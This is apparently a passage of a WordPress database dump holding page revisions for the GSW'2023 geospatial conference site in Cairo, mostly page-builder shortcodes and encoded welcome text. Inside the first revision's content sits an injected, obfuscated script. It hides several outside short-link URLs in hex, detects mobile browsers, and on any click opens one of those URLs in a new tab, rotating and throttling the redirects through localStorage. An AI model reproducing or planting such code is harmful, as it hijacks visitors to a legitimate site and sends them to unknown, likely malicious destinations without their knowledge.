JTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" br_style=\"outset\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-19 16:23:52','2022-10-19 16:23:52','',2167,'https://gsw2023.com/?p=2908',0,'revision','',0),
(2909,1,'2022-10-19 16:24:27','2022-10-19 16:24:27','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" 